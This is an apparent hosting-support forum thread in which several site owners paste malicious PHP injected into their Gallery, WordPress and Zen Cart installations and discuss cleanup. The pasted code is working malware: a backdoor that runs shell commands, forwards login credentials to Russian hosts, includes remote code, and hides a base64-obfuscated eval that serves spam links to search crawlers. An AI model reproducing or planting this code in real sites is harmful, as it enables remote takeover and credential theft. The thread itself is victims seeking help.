Gallery got hacked, need help decyphering code

[Fireye]

So, I went in to zip up all my images, and I found these odd files. Upon checking the .htaccess, and running a decode64 on the base64 codes... these are definintly malicious files. The files were mostly found in my images directory (which makes sense, as images are directly uploaded by a script and put there). Can anyone help me figure out how they did this? I'll put the various other scripts (hand coded, mostly) in a followup post. Oh, and the base64 stuff decodes to http://bis.iframe.ru/master.php?r_addr=.

PHP Code:

/backup
.htaccess
    Options -MultiViews
    ErrorDocument 404 //gallery/backup/properties.php


properties.php
    <? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

system.php
<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>

----------------
/images
date.php
    <?php
    error_reporting(0);
    if(isset($_POST["l"]) and isset($_POST["p"])){
        if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
        else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
    }else{$user_auth="";}
    if(!isset($_POST["log_flg"])){$log_flg="&log";}
    if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
    {
        if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
        if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
    }
    ?>

==========
/images/foto
.htaccess
    Options -MultiViews
    ErrorDocument 404 //gallery/images/foto/contacts.php

common.php
    <?php
    error_reporting(0);
    if(isset($_POST["l"]) and isset($_POST["p"])){
        if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
        else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
    }else{$user_auth="";}
    if(!isset($_POST["log_flg"])){$log_flg="&log";}
    if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
    {
        if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
        if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
    }
    ?>

contacts.php
    <? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

[Fireye]

You can find my sources at http://gallery.hinome.net/temp, I've removed passwords, but that's all I should need to do for security I guess.

[Andreas Climent]

Wow, I have a very similar problem with my Wordpress installation on karmacube.com and lostblog.net.

When I checked out my sites today they where blank, so I whent to the Wordpress admin pages. There I got the message "your databases are out of date, please update." I had no idea why my databases would be outdated but I figured it was a legitimate message so I clicked upgrade. It looked like wordpress upgraded and the site looked fine again, except for changes in my css file and a link to "download iso buster" in the footer of lostblog.net. I also found the following code in all the files in my wordpress template:

The code i get is

Code:

< ?php get_archives('postbypost','5','html');
 error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? 
$_SERVER["HTTP_HOST"] : $HTTP_HOST); 
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : 
$SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? 
$_SERVER["REQUEST_URI"] : $REQUEST_URI); 
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ?
 $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); 
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : 
$REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? 
$_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str))){}
 else {include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}
? >

At first I thought I was hacked by a guy who is blackmailing me, but it appears we have been affected by a very similar problem!

I've opened two tickets but Micfo support have not answered for hours...
I really want to get this sorted out as soon as possible, and I'm sure Fireye feels the same.

[Fireye]

Quote:

Originally Posted by Andreas Climent

Wow, I have a very similar problem with my Wordpress installation on karmacube.com and lostblog.net.

When I checked out my sites today they where blank, so I whent to the Wordpress admin pages. There I got the message "your databases are out of date, please update." I had no idea why my databases would be outdated but I figured it was a legitimate message so I clicked upgrade. It looked like wordpress upgraded and the site looked fine again, except for changes in my css file and a link to "download iso buster" in the footer of lostblog.net. I also found the following code in all the files in my wordpress template:

The code i get is

Code:

< ?php get_archives('postbypost','5','html');
 error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? 
$_SERVER["HTTP_HOST"] : $HTTP_HOST); 
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : 
$SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? 
$_SERVER["REQUEST_URI"] : $REQUEST_URI); 
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ?
 $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); 
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : 
$REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? 
$_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str))){}
 else {include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}
? >

At first I thought I was hacked by a guy who is blackmailing me, but it appears we have been affected by a very similar problem!

I've opened two tickets but Micfo support have not answered for hours...
I really want to get this sorted out as soon as possible, and I'm sure Fireye feels the same.

Your base64 decodes to user7.phpinclude.ru, so slightly different than mine, but the same general idea. What server are you on? I think it's possible for phpBB vulnerabilities to allow cross-user hacking.

[Andreas Climent]

I was on Thailand before the migration, I'm not sure which one I'm at right now.

Edit: It appears I'm on rothwell.micfo.com now

If this is realated to russian domains, I wouldn't discard that it has something to do with the guy who is blackmailing me.. he is russian from what I understand.
I have the domain neverday.net and never registered neverday.com when it became available. So then this guy came along and registered .com with the only purpose to try to make me pay him for it. He wants a $99 .mac account in exchange for it.

I know this guy from before since he has stolen designs and content from me and my friends in the past. He is banned for life on two graphic forums for these reasons. Now, I can't prove he is behind this, but as I said, I wouldn't discard it.

Still no answer from the support by the way..

[Fireye]

Quote:

Originally Posted by Andreas Climent

I was on Thailand before the migration, I'm not sure which one I'm at right now.

Edit: It appears I'm on rothwell.micfo.com now

If this is realated to russian domains, I wouldn't discard that it has something to do with the guy who is blackmailing me.. he is russian from what I understand.
I have the domain neverday.net and never registered neverday.com when it became available. So then this guy came along and registered .com with the only purpose to try to make me pay him for it. He wants a $99 .mac account in exchange for it.

I know this guy from before since he has stolen designs and content from me and my friends in the past. He is banned for life on two graphic forums for these reasons. Now, I can't prove he is behind this, but as I said, I wouldn't discard it.

Still no answer from the support by the way..

Wow, that's pretty crazy! I'm on Rothwell as well... hmm.

[sciencem]

I too am on rothwell and suffered the same problem, but with a zen cart installation. It looks like the problem has also hit somebody's oscommerce setup and joomla.

[flavius]

I am having the same problem with my gallery and also found those .htaccess files. My gallery comes up blank too. Simply removing the .htaccess files didn't work (yes, I really had hoped it would be that easy ) I am on tara as far as I know.

[flavius]

Okay I "fixed" my gallery at least. All files that were manipulated were changed on Jan 18th so I checked them all and removed the code. Mostly header and footer files. They had javascripts and links to other sites in them that appeared like product links. It wasn't just my gallery as I thought so I am going through everything else right now.

Only...how do I prevent this from happening again ? How can someone get to my files and change them ? I am not really THAT good with scripts and so forth to know what to do now....

Help ? Micfo ?

[twister]

I have the same problem. Few of my websites was hacked in the same way, at Jan 18th It means that it is Micfo's security problem.
Regards

[eternaluxe]

Here are some vulnerabilities listed at secunia.com for oscommerce.

-eternaluxe

[eternaluxe]

Joomla: http://secunia.com/advisories/18513/
ZenCart: http://secunia.com/search/?search=zen+cart&w=0
Coppermine: http://secunia.com/search/?search=coppermine

Hey gang, if you are using any of the third party Fantastico addons, it is well worth your while to register with the folks that produce those add-ons.
Sign up for email alerts. I know phpbb has been good about letting their users know about possible vulnerabilities and it's saved my butt, too. If you're not on the lists, though, you might not find out about a problem until it is too late.
-eternaluxe

[jbeyler]

I have the same problem!!! Server Moscow...any solution here?

[sheepdog]

it is because the directories are chmode 777.

[celestial]

somebody hacked up mine real bad. i did not have the directory permissions set either, but i do not think this was the entire problem. this zen-cart hack is probably popular amongst these lowlife vampires. what they did was modify a bunch of my files, but mainly "application_bottom.php", resulted in tags to illegal websites selling drugs being placed at the bottom of ALL of my pages in zen-cart! but not where i had access to edit. only when googlebot (and probably others) scanned my pages these tags were appended. i had a bunch of this crap code in a bunch of my php files. here is "application_bottom"
<?php
/**
* application_bottom.php
* Common actions carried out at the end of each page invocation.
*
* @package initSystem
* @copyright Copyright 2003-2006 Zen Cart Development Team
* @copyright Portions Copyright 2003 osCommerce
* @license http://www.zen-cart.com/license/2_0.txt GNU Public License V2.0
* @version $Id: application_bottom.php 5658 2007-01-21 19:39:51Z wilt $
*/
if (!defined('IS_ADMIN_FLAG')) {
die('Illegal Access');
}
// close session (store variables)
session_write_close();

// breaks things
// pconnect disabled (safety switch)
// $db->close();

if ( (GZIP_LEVEL == '1') && ($ext_zlib_loaded == true) && ($ini_zlib_output_compression < 1) ) {
if ( (PHP_VERSION < '4.0.4') && (PHP_VERSION >= '4') ) {
zen_gzip_output(GZIP_LEVEL);
}
}
?><?php

eval(base64_decode('DQokXzQzOWVjMWNiMGYxNjU2YzY2MT dmNDFkODhjZjk0ODMwID0gY2hyKDExNSkuY2hyKDExNykuY2hy KDk4KS5jaHIoMTE1KS5jaHIoMTE2KS5jaHIoMTE0KTsNCiRfMj kzODI5N2RhM2I5YTgzNDAzMDcwNWIzYWE1OWQ5M2EgPSBjaHIo MTA5KS5jaHIoMTAwKS5jaHIoNTMpOw0KJF9iYTMwNDI4YjZjMD Q5MjA4YTc2NjU3YzY0ODBiN2RkZiA9IGNocigxMDIpLmNocigx MTUpLmNocigxMTEpLmNocig5OSkuY2hyKDEwNykuY2hyKDExMS kuY2hyKDExMikuY2hyKDEwMSkuY2hyKDExMCk7DQokX2VjYWE3 NTk2YjQzOWI5YWY2MGNjOTgzYjIwNjdmYWJjID0gY2hyKDEwMi kuY2hyKDExMikuY2hyKDExNykuY2hyKDExNikuY2hyKDExNSk7 DQokXzkxNTg4ZGI1NTNhZDRiOGNjNjI0ZDFjZjZmYWRmMzY4ID 0gY2hyKDEwMikuY2hyKDEwMykuY2hyKDEwMSkuY2hyKDExNiku Y2hyKDExNSk7DQokXzFkMzQyYmM4YTg5OTBhYWUxZWQyOWI1Mm ZkNTEzMzhjID0gY2hyKDExNSkuY2hyKDExNikuY2hyKDExNCku Y2hyKDExNSkuY2hyKDExNikuY2hyKDExNCk7DQokX2EzMjBlYj YwNjUxYjI5MWNhNDc5ZjQzYTg4NTZiNzNhID0gY2hyKDk1KS5j aHIoODMpLmNocig2OSkuY2hyKDgyKS5jaHIoODYpLmNocig2OS kuY2hyKDgyKTsNCiRfNWE2NzIzNjQ3NDNlYmExYmMwNzM2M2U0 YmZjZWQwNWMgPSAkJF9hMzIwZWI2MDY1MWIyOTFjYTQ3OWY0M2 E4ODU2YjczYTsNCg0KaWYoJF8xZDM0MmJjOGE4OTkwYWFlMWVk MjliNTJmZDUxMzM4YygkXzVhNjcyMzY0NzQzZWJhMWJjMDczNj NlNGJmY2VkMDVjW2Nocig3MikuY2hyKDg0KS5jaHIoODQpLmNo cig4MCkuY2hyKDk1KS5jaHIoODUpLmNocig4MykuY2hyKDY5KS 5jaHIoODIpLmNocig5NSkuY2hyKDY1KS5jaHIoNzEpLmNocig2 OSkuY2hyKDc4KS5jaHIoODQpXSwgY2hyKDcxKS5jaHIoMTExKS 5jaHIoMTExKS5jaHIoMTAzKS5jaHIoMTA4KS5jaHIoMTAxKS5j aHIoOTgpLmNocigxMTEpLmNocigxMTYpKSkgew0KIGZvcigkX2 EyZWZlZjZjM2UwYzY1OTI2NmEzNjEyZjA4ZTBmMjE5PTQ1ODU2 NzskX2EyZWZlZjZjM2UwYzY1OTI2NmEzNjEyZjA4ZTBmMjE5PD Q1ODU3NTskX2EyZWZlZjZjM2UwYzY1OTI2NmEzNjEyZjA4ZTBm MjE5KyspIHsNCiAgJF8zN2FhNWYxNDlhNjU3MmU3ZmIwM2ViMT hlMTUwYzZkYyA9ICRfNDM5ZWMxY2IwZjE2NTZjNjYxN2Y0MWQ4 OGNmOTQ4MzAoJF8yOTM4Mjk3ZGEzYjlhODM0MDMwNzA1YjNhYT U5ZDkzYSgkX2EyZWZlZjZjM2UwYzY1OTI2NmEzNjEyZjA4ZTBm MjE5KSwgMCwgMTYpIC4gY2hyKDQ2KS5jaHIoMTA1KS5jaHIoMT EwKS5jaHIoMTAyKS5jaHIoMTExKTsNCiAgJF8wMDJhOGM1MDhi OGUyMzkyZTYwYmI5ZmZlZWNlNDZjMD0kX2JhMzA0MjhiNmMwND kyMDhhNzY2NTdjNjQ4MGI3ZGRmKCRfMzdhYTVmMTQ5YTY1NzJl N2ZiMDNlYjE4ZTE1MGM2ZGMsIGNocig1NikuY2hyKDQ4KSk7DQ ogIGlmKCEkXzAwMmE4YzUwOGI4ZTIzOTJlNjBiYjlmZmVlY2U0 NmMwKSANCiAgIGNvbnRpbnVlOw0KICAkX2VjYWE3NTk2YjQzOW I5YWY2MGNjOTgzYjIwNjdmYWJjKCRfMDAyYThjNTA4YjhlMjM5 MmU2MGJiOWZmZWVjZTQ2YzAsIGNocig3MSkuY2hyKDY5KS5jaH IoODQpLmNocigzMikuY2hyKDQ3KS5jaHIoNTcpLmNocigxMDAp LmNocigxMDApLmNocigxMDApLmNocigxMDIpLmNocig1MCkuY2 hyKDk3KS5jaHIoNTIpLmNocigxMDIpLmNocig1NSkuY2hyKDEw MCkuY2hyKDU3KS5jaHIoNTIpLmNocig1MykuY2hyKDU3KS5jaH IoNTIpLmNocigxMDEpLmNocig5OSkuY2hyKDUwKS5jaHIoMTAx KS5jaHIoOTcpLmNocig1NykuY2hyKDU2KS5jaHIoNTIpLmNoci g0OCkuY2hyKDU1KS5jaHIoOTcpLmNocig1MikuY2hyKDQ5KS5j aHIoNDgpLmNocigxMDEpLmNocig0OSkuY2hyKDMyKS5jaHIoNz IpLmNocig4NCkuY2hyKDg0KS5jaHIoODApLmNocig0NykuY2hy KDQ5KS5jaHIoNDYpLmNocig0OSkuIlxyXG4iLmNocig3MikuY2 hyKDExMSkuY2hyKDExNSkuY2hyKDExNikuY2hyKDU4KS5jaHIo MzIpLiRfMzdhYTVmMTQ5YTY1NzJlN2ZiMDNlYjE4ZTE1MGM2ZG MuIlxyXG4iLmNocig4MikuY2hyKDEwMSkuY2hyKDEwMikuY2hy KDEwMSkuY2hyKDExNCkuY2hyKDEwMSkuY2hyKDExNCkuY2hyKD U4KS5jaHIoMzIpLmNocigxMDQpLmNocigxMTYpLmNocigxMTYp LmNocigxMTIpLmNocig1OCkuY2hyKDQ3KS5jaHIoNDcpIC4gJF 81YTY3MjM2NDc0M2ViYTFiYzA3MzYzZTRiZmNlZDA1Y1tjaHIo ODMpLmNocig2OSkuY2hyKDgyKS5jaHIoODYpLmNocig2OSkuY2 hyKDgyKS5jaHIoOTUpLmNocig3OCkuY2hyKDY1KS5jaHIoNzcp LmNocig2OSldIC4gJCRfYTMyMGViNjA2NTFiMjkxY2E0NzlmND NhODg1NmI3M2FbY2hyKDgyKS5jaHIoNjkpLmNocig4MSkuY2hy KDg1KS5jaHIoNjkpLmNocig4MykuY2hyKDg0KS5jaHIoOTUpLm Nocig4NSkuY2hyKDgyKS5jaHIoNzMpXS4iXHJcblxyXG4iKTsN CiAgJF9mYzVjOTQ2MmU1ZTc4YTkzYmRlN2RmMzE4MmQyZjFlZT 0wOw0KICB3aGlsZSgkX2Y0MWI4YTdlZWM5ZTEzMzM5ZDI3ZDZm ODYxOTNiZGM0ID0gJF85MTU4OGRiNTUzYWQ0YjhjYzYyNGQxY2 Y2ZmFkZjM2OCgkXzAwMmE4YzUwOGI4ZTIzOTJlNjBiYjlmZmVl Y2U0NmMwLCAxMDI0KSkgew0KICAgaWYoJF9mYzVjOTQ2MmU1ZT c4YTkzYmRlN2RmMzE4MmQyZjFlZSkgew0KICAgIGlmKCRfMWQz NDJiYzhhODk5MGFhZTFlZDI5YjUyZmQ1MTMzOGMoJF9mNDFiOG E3ZWVjOWUxMzMzOWQyN2Q2Zjg2MTkzYmRjNCxjaHIoNDUpLmNo cig0NSkuY2hyKDQ1KS5jaHIoNDUpLmNocig0NSkpKXsNCiAgIC AgYnJlYWs7DQogICAgfQ0KICAgIGVjaG8oJF9mNDFiOGE3ZWVj OWUxMzMzOWQyN2Q2Zjg2MTkzYmRjNCk7IA0KICAgfQ0KICAgaW YoJF8xZDM0MmJjOGE4OTkwYWFlMWVkMjliNTJmZDUxMzM4Yygk X2Y0MWI4YTdlZWM5ZTEzMzM5ZDI3ZDZmODYxOTNiZGM0LGNoci g0NSkuY2hyKDQ1KS5jaHIoNDUpLmNocig0NSkuY2hyKDQ1KSkp IHsNCiAgICAkX2ZjNWM5NDYyZTVlNzhhOTNiZGU3ZGYzMTgyZD JmMWVlPTE7DQogICAgY29udGludWU7DQogICB9DQogIH0NCiAg aWYoJF9mYzVjOTQ2MmU1ZTc4YTkzYmRlN2RmMzE4MmQyZjFlZS kNCiAgIGJyZWFrOw0KIH0NCn0='));

?>



What happened to my site seems alot more complex than what was mentioned by others here. Only a line or two of this code in other files but look at all that in mine! It had a rotating gallery of illegal sites connected to every single page, jeez that does not look good for my site anyway. i think i have it mostly fixed, but only by running the utility "winmerge" comparing every php file from the original source code to my current files, then replacing them one by one. they got over 20 files appended with tags like that. even had modified a file in the root directory of my host, i dont know how they did that but it had the same tags in it.

i set the permissions on all my files after replacing them and changed my hosting password, changed my admin password (they had replaced the name of my site through my admin with a bunch of garbage after the actual name), thought i locked everything down. but i checked it today (fixed things 2 days ago) and the same file application_bottom.php had been manipulated again! thankfully no others though. i changed the permission *again* on the directory. I dont know how they are doing it but it seems to be a popular business these days. thats my story anyway.